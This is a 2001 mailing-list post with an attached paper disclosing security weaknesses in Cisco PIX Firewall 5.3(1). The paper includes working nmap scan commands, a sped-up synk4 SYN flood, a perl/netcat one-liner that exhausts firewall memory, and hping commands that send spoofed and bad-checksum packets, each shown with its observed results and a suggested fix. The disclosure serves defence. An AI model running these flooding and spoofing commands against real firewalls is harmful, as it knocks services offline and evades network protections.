Date: Fri, 9 Mar 2001 19:32:41 +0100
From: "Fabio Pietrosanti (naif)" <[email protected]>
To: [email protected]Subject: Cisco PIX Security Notes
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Working with Cisco PIX Firewall i wrote some note about possible security
problem of Cisco PIX .
Attached the paper Cisco_PIX_Notes.txt :)
Pietrosanti Fabio I.NET SpA, High Quality Access to the Internet
e-mail: [email protected] ( Direzione Tecnica, Security Staff )
[email protected]
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Sede: Via Darwin, 85 20019 Settimo Milanese (MI)
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Free advertising: - Multiplatform Ultra-secure OS
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*********************************** Cisco PIX Notes **********************************
-- Introduction
This is a simples paper on which i wrote down some note about "Cisco PIX Firewall" so it isn't well
organized or talk specifically about a vulnerability .
All test it's about THE latest pix release on this pix:
Cisco Secure PIX Firewall Version 5.3(1)
Hardware: SE442, 128 MB RAM, CPU Pentium II 350 MHz
Flash i28F640J5 @ 0x300, 16MB
BIOS Flash AT29C257 @ 0xfffd8000, 32KB
0:8 ethernet0: add is 00d0.b790.5685, irq 11
1: ethernet1: address is 00e0.b601.cfbd, irq 15
2: ethernet2: address is 00e0.b601.cfbc, irq 10
3: ethernet3: address is 00e0.b601.cfbb, irq 9
4: ethernet4: address is 00e0.b601.cfba, irq 11
5: ethernet5: address is 00d0.b790.512e, irq 10
VPN-DES: Enabled
VPN-3DES: Enabled
Throughput: Unlimited
Here a snip of the configuration:
PIX Version 5.3(1)
ip address outside external_pix
ip address naif
ip verify reverse-path interface naif
ip verify reverse-path interface outside
ip audit name info_naif info action alarm
ip audit name attack_naif attack action alarm drop
ip audit interface naif info_naif
ip audit interface naif attack_naif
static (naif,outside) external_spyzone netmask 0 0 <-- No connection limit
access-list acl_outside permit tcp host naif_ip host external_spyzone eq www
access-group acl_outside in interface outside
access-list acl_naif permit ip any any
access-group acl_naif in interface naif
floodguard enable
sysopt security fragguard
telnet naif
ssh naif
I used for my test hping, nmap, synk4, telnet, tcpdump, netcat(nc) .
Outside used to start attack: naif_ip ( Linux 2.4)
Outside static nat of external_spyzone
Outside pix ip: external_pix
Internal pix ip:
Internal box ip: ( Linux 2.2.18 )
Another Internal box ip: ( AIX 4.2 )
-- Cisco PIX Firewall Logging Feature when firewall is probed.
This is what appens when a pix was probed directly from outside world.
note: pix is using "logging console debug"
note: on every tcp packet to 23/tcp or 1467/tcp of the pix log: 402106: Rec'd packet not an IPSEC packet.
- Syn Scan
nmap -sS -F -O external_pix -T Insane
- Response:
402106: Rec'd packet not an IPSEC packet. (ip) dest_addr= external_pix, src_addr= naif_ip, prot= tcp
- UDP Scan
nmap -sU -T Insane external_pix
- Response: none
- Fin Scan
nmap -sF -T insane external_pix
- Response:
402106: Rec'd packet not an IPSEC packet. (ip) dest_addr= external_pix, src_addr= naif_ip, prot= tcp
- XMAS Scan
nmap -sX -T insane external_pix
- Response:
402106: Rec'd packet not an IPSEC packet. (ip) dest_addr= external_pix, src_addr= naif_ip, prot= tcp
402106: Rec'd packet not an IPSEC packet. (ip) dest_addr= external_pix, src_addr= naif_ip, prot= tcp
- NULL Scan
nmap -sN -T insane external_pix
- Response:
402106: Rec'd packet not an IPSEC packet. (ip) dest_addr= external_pix, src_addr= naif_ip, prot= tcp
402106: Rec'd packet not an IPSEC packet. (ip) dest_addr= external_pix, src_addr= naif_ip, prot= tcp
- Ack Scan
nmap -sA -T insane external_pix
- Response:
402106: Rec'd packet not an IPSEC packet. (ip) dest_addr= external_pix, src_addr= naif_ip, prot= tcp
- Window Scan
nmap -sW -T insane external_pix
- Response:
402106: Rec'd packet not an IPSEC packet. (ip) dest_addr= external_pix, src_addr= naif_ip, prot= tcp
- Syn+Fin packet
hping -c 1 -S -F -p 99 external_pix
- Response: none
- Fragmented syn:
hping -f -c 1 -S -p 99 external_pix
- Response
106020: Deny IP teardrop fragment (size = 4, offset = 16) from naif_ip to external_pix
Logging with this release has many problem, but we tested 6.0 beta and some of other problem was resolved.
-- Cisco PIX Firewall syn flood * EASY DOS WITH PIX
For this testing I've installed a webserver on statically mapped to external_spyzone.
I used synk4 with the 318' line of code changed from usleep(300) to usleep(10) so
I'll send syn at a good rate [my 0,2 cents: Fabio, at which rate??. This could be interesting, do you agree?].
Let's go:
naif:/home/naif/pixdebug# ./synk4 external_spyzone 80 80
Tada'!!! After about 4 second external_spyzone doesn't reply anymore on 80/tcp port.
Looking at the pix:
skifo-pix(config)# show conn
307 in use, 522 most used
With only 307 syn we made an efficient Syn Flood and Cisco PIX didn't manage it and the service go down.
Sure, no SYN packets are received by due to his "tcp intercept" feature: it makes a connection
with the internal server only after the 3way handshake and thus the connection is completed. Syn flood
protection doesn't work .
Now we have either to wait for default 5 minutes timeout or we have to make a clear xlate to TearDown
all connection and cleanup the PIX Connection Table .
I think that everyone with a 14.4 modem could do a successfull syn flood against
server ''protected'' by the pix.
Solution: to implement a working "tcp intercept" feature like on IOS IP/FW 12
p.s. where i'm working, in past some customer was syn flooded and pix does'nt reject the attack,
instead a Cisco Router with IOS IP/FW/IDS with "ip tcp intercept" protect it.
-- Cisco PIX Memory Fill
Internal users with enabled telnet may fill completely the Cisco PIX memory sending data to
Cisco PIX Secure Database Manager port ( 1467/tcp ) .
Cisco PIX accept a maximum of 7 connection to csdm port so we issue from
our linux box on internal network with telnet enabled access :
for in `seq 7` ; do (perl -e 'while(true) { print "PIXSUX"x600 }' | nc 1467&) ; done
I could verify the fill of memory connected to the console with minicom with
the command "show mem" .
skifo-pix(config)# show mem
1342177h28 bytes total,45728 bytes free
Solution: to avoid spoofing or impersonification of management console
use either console only or SSH to manage PIX .
-- Cisco does not check spoofing under certain condition ( ssh port )
For this test I enabled ssh from outside host with:
ssh naif_ip outside
For some reason PIX disable anti-spoofing check when packet
are destinated to pix on SSH port.
>From an external box i send this packet:
naif:/home/naif# hping -S -c 1 -p 22 -a external_pix
On the internal networking using tcpdump i could see:
01:11:59.585798 external_pix.22 > S 1862166451:1862166451(0) ack 907686624 win 4096 <mss 1024> (ttl 255, id 9049)
WOW, ip reverse-path verification doesn't work here...
notes: If you enable ssh on a interface ( outside,inside or other )
it will bind ssh to this interface, and it will deny the connection
only at application level ; It means that you could open a socket
to ssh port ( so you could syn flood it and avoid the Firewall
manager to manage the pix via ssh ) .
-- Cisco does not check spoofing under certain condition ( PPTP port )
For this test I enabled pptp from outside with this configuration:
vpdn group 1 accept dialin pptp
vpdn group 1 ppp authentication pap
vpdn group 1 ppp authentication chap
vpdn group 1 ppp authentication mschap
vpdn group 1 client configuration address local pptp_test
vpdn group 1 client authentication local
vpdn username ftptest password ftptest1
vpdn enable outside
sysopt connection permit-pptp
>From an external box send this packet:
naif:~# hping -c 1 -p 1723 -S -s 669 -a external_pix
On the internal networking using tcpdump I see:
00:16:34.113812 external_pix.1723 > S 804103784:804103784(0) ack 695987355 win 4096 <mss 1024> (ttl 255, id 9232)
For some reason PIX disable anti-spoofing check when packet
are destinated to pix on PPTP port.
Then on the log we will see:
213001: PPTP control daemon socket io read error, errno = 32
note: the pptp daemon of pix is also vulnerable to syn flood
note2: It's not possible to block access to pptp server using
pix access-list so everyone could open a socket to pptp
daemon as for ssh .
-- Cisco PIX SMTP Fixup not working properly
Ok, Ok, now fixup isn't bypassable but It will not rewrite completely
our command .
but what happens if I write, as for example, "pixsux" ?
The pix translate "pixsux" to XXXXXX and send it to the SMTP Server .
and on debug console we could see:
smtp_cmd: cmd = unknown entering reply mode
smtp: X-ing pixsux
Ok, in the past we found some vulnerabilities now fixed.
However something to fix is present yet.
We could pass something that it's not only XXXXXX sending
proibited command. When we send command such as EXPN, HELP,
VRFY then pix rewrite correctly this command but it doesn't rewrite
other data on the same line( which must be in the same packet ).
If I send to smtp server:
pix, instead of rewriting all XXXX, translates it to the server as
and on debug console we could simply see:
smtp_cmd: cmd = help entering reply mode
smtp: nullify <help> command
On logging level 4 we're not notified that someone tryied to
send proibited command.
Solution I : TO rewrite ALL not allowed character to X's
Solution II : TO Notify on warnings log level the SMTP command attempt.
-- Cisco PIX doesn't check for bad checksum in ip header.
While playing with hping and pix I noticed that pix doesn't check the
checksum of the ip header and forward the packet inside the pix .
Look here, we'll send 2 packets:
* First ( with wrong checksum)
naif:~/isic-0.05# hping -S -badcksum -c 1 -p 25 spyzone -k -M 0 -o 0x10 -w 0 -t 0 -N 1
eth0 default routing interface selected (according to /proc)
HPING spyzone (eth0 external_spyzone): S set, 40 headers + 0 data bytes
--- spyzone hping statistic ---
1 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
* Second (with correct checksum)
naif:~/isic-0.05# hping -S -s 2154 -c 1 -p 25 spyzone -k -M 0 -o 0x10 -w 0 -t 0 -N 1
eth0 default routing interface selected (according to /proc)
HPING spyzone (eth0 external_spyzone): S set, 40 headers + 0 data bytes
46 bytes from external_spyzone: flags=SA seq=0 ttl=64 id=29461 win=32696 rtt=1.6 ms
--- spyzone hping statistic ---
1 packets tramitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 1.6/1.6/1.6 ms
Tcpdumping on the internal network....
Packets with wrong checksum are passed:
02:32:33.451984 naif_ip.2154 > S 0:0(0) win 0 [ttl 0] (id 1)
4500 0028 0001 0000 0006 1d03 d55c 04c5
c0a8 0303 086a 0019 0000 0000 2a7f f1d0
5002 0000 c1ed 0000 0000 0000 0000
Packet with correct checksum:
20:18:58.762430 naif_ip.2154 > S 0:0(0) win 0 [ttl 0] (id 1)
4500 0028 0001 0000 0006 1d03 d55c 04c5
c0a8 0303 086a 0019 0000 0000 ea8d 14bf
5002 0000 0a46 0000 0000 0000 0000
20:18:58.762536 > naif_ip.2154: S 1324271885:1324271885(0) ack 1 win 32696 <mss 536> (DF) (ttl 64, id 29900) 4500 002c 74cc 4000 4006 2833 c0a8 0303
d55c 04c5 0019 086a 4eee c90d 0000 0001
6012 7fb8 5dad 0000 0204 0218
20:18:58.763244 naif_ip.2154 > R 1:1(0) win 0 (DF) (ttl 255, id 0)
4500 0028 0000 4000 ff06 de02 d55c 04c5
c0a8 0303 086a 0019 0000 0001 c9bc 9c9f
5004 0000 a333 0000 0000 0000 0000
Solution: adding sanity check for ip header checksum .
-- Cisco PIX and ICMP
For some stupid reason Cisco PIX with default setting accepts icmp echo-request
destinated to the pix from any source.
You could send a maximum of an icmp echo-request fragmented into
12 packets having the maximum size of the media ( 1500 for ethernet ) .
naif:/home/naif/SING-1.0# ./sing -v -echo -c 1 -s 17000 -G external_pix -c 1
SINGing to external_pix (external_pix): 17016 data bytes
17016 bytes from external_pix: seq=0 ttl=255 TOS=0 time=30.298 ms
--- external_pix sing statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 30.298/30.298/30.298 ms
16:50:54.981719 naif_ip > external_pix: icmp: echo request (frag 13170:1480@0+) (ttl 255, len 1500)
16:50:54.982843 naif_ip > external_pix: (frag 13170:1480@1480+) (ttl 255, len 1500)
16:50:54.983595 naif_ip > external_pix: (frag 13170:1480@2960+) (ttl 255, len 1500)
16:50:54.984502 naif_ip > external_pix: (frag 13170:1480@4440+) (ttl 255, len 1500)
16:50:54.985752 naif_ip > external_pix: (frag 13170:1480@5920+) (ttl 255, len 1500)
16:50:54.987001 naif_ip > external_pix: (frag 13170:1480@7400+) (ttl 255, len 1500)
16:50:54.988254 naif_ip > external_pix: (frag 13170:1480@8880+) (ttl 255, len 1500)
16:50:54.989505 naif_ip > external_pix: (frag 13170:1480@10360+) (ttl 255, len 1500)
16:50:54.990751 naif_ip > external_pix: (frag 13170:1480@11840+) (ttl 255, len 1500)
16:50:54.991997 naif_ip > external_pix: (frag 13170:1480@13320+) (ttl 255, len 1500)
16:50:54.993243 naif_ip > external_pix: (frag 13170:1480@14800+) (ttl 255, len 1500)
16:50:54.994491 naif_ip > external_pix: (frag 13170:736@16280) (ttl 255, len 756)
16:50:54.998548 external_pix > naif_ip: icmp: echo reply (frag 9141:1480@0+) (ttl 255, len 1500)
16:50:54.999775 external_pix > naif_ip: (frag 9141:1480@1480+) (ttl 255, len 1500)
16:50:55.001011 external_pix > naif_ip: (frag 9141:1480@2960+) (ttl 255, len 1500)
16:50:55.002238 external_pix > naif_ip: (frag 9141:1480@4440+) (ttl 255, len 1500)
16:50:55.003485 external_pix > naif_ip: (frag 9141:1480@5920+) (ttl 255, len 1500)
16:50:55.004710 external_pix > naif_ip: (frag 9141:1480@7400+) (ttl 255, len 1500)
16:50:55.005945 external_pix > naif_ip: (frag 9141:1480@8880+) (ttl 255, len 1500)
16:50:55.007164 external_pix > naif_ip: (frag 9141:1480@10360+) (ttl 255, len 1500)
16:50:55.008407 external_pix > naif_ip: (frag 9141:1480@11840+) (ttl 255, len 1500)
16:50:55.009632 external_pix > naif_ip: (frag 9141:1480@13320+) (ttl 255, len 1500)
16:50:55.010878 external_pix > naif_ip: (frag 9141:1480@14800+) (ttl 255, len 1500)
16:50:55.011395 external_pix > naif_ip: (frag 9141:736@16280) (ttl 255, len 756)
Every icmp packet forwarded by the pix will always use "ttl 255".
It will not echo TOS.
It will not echo DF.
It will not echo Unused Bit.
Using access-list you cannot deny icmp destinated to the Firewall.
Solution: to deny icmp using "icmp deny any 8 outside" so it will apply globally to the interface .
--- Cisco PIX Firewall Semantic Problem
This is an article about how you could apply filter on the pix and
we talk about pix common misconfiguration.
* Semantic Problem
First of all, you know that a Firewall , for security reasons, needs
filter should be applied for packet flowing in and out on each interface, ok?
With Cisco IOS you can do it, with Checkpoint you can do it, with ipchains/netfilter/ipfilter/ipfw you
can do it, with Sonicwall you can do it!! And with PIX? no, with pix you cannot have different
access-lists for different interfaces, for different traffic ( in, out ) !
Old pix uses a stupid concept of outbound/conduit, but now since 5.1(1) we could use
access-list .
Sure, access-list it's better than conduit/outbound but you cannot use it, as on
IOS, bye appliying different acl's on a interface, one for input packet, and one for output packet .
When you apply an access-list to interface outside, it matches packets coming in.
When you apply an access-list to other interfaces ( inside, dmz, etc ) , it matches
only packets coming out from the interface .
* Common Misconfiguration
You know the "security level" of pix, for which every interface with higher security level
is allowed to communicate with lower security level and if a box on a interface with lower security level
wish to communicate with highest security level you need to put a "static" .
Ok, think about this situation:
Web server in the DMZ ( security level 50 )
Database in the Inside ( security level 100 )
>From dmz all it's allowed going to internet
with access-list acl_dmz permit ip any any .
There are these configurations.
: we want our webserver it's visible on the internet
static (dmz,outside) external-web-server-ip web-server-dmz-ip netmask 0 0
: we want our database it's visible from dmz
static (inside,dmz ) internal-ip-of-db internal-ip-of-db netmask 0 0
: permission from internet to the web server ( remember how acl's works on pix )
access-list acl_outside permit tcp any host external-web-server-ip eq 80
access-group acl_outside in interface outside
: permission From dmz to internet ( full access )
access-list acl_dmz permit ip any any
access-group acl_dmz in interface dmz
: permission From inside to internet and dmz ( full access )
access-list acl_inside permit ip any any
access-group acl_inside in interface inside
I see many pix with this kind of configuration, just few ppl apply rules for packet
coming out from the interface or simply doesn't apply them ( so everything it's permitted ) .
The problem arises in the static inside-dmz because the static bypasses the PIX security level,
so every host on the dmz is allowed to connect in full-ip to internal-ip-of-db, unless you have
an explicit deny .
Solution: to avoid using the keyword "any" on acl_dmz or lower
security level. The corerct syntax to be used is to put an
before explicit "deny" for the network presented as static.
my 2 cents
Fabio Pietrosanti ( naif )
[email protected]
naif@Undernet #sikurezza
Thanks to vodka for her support :*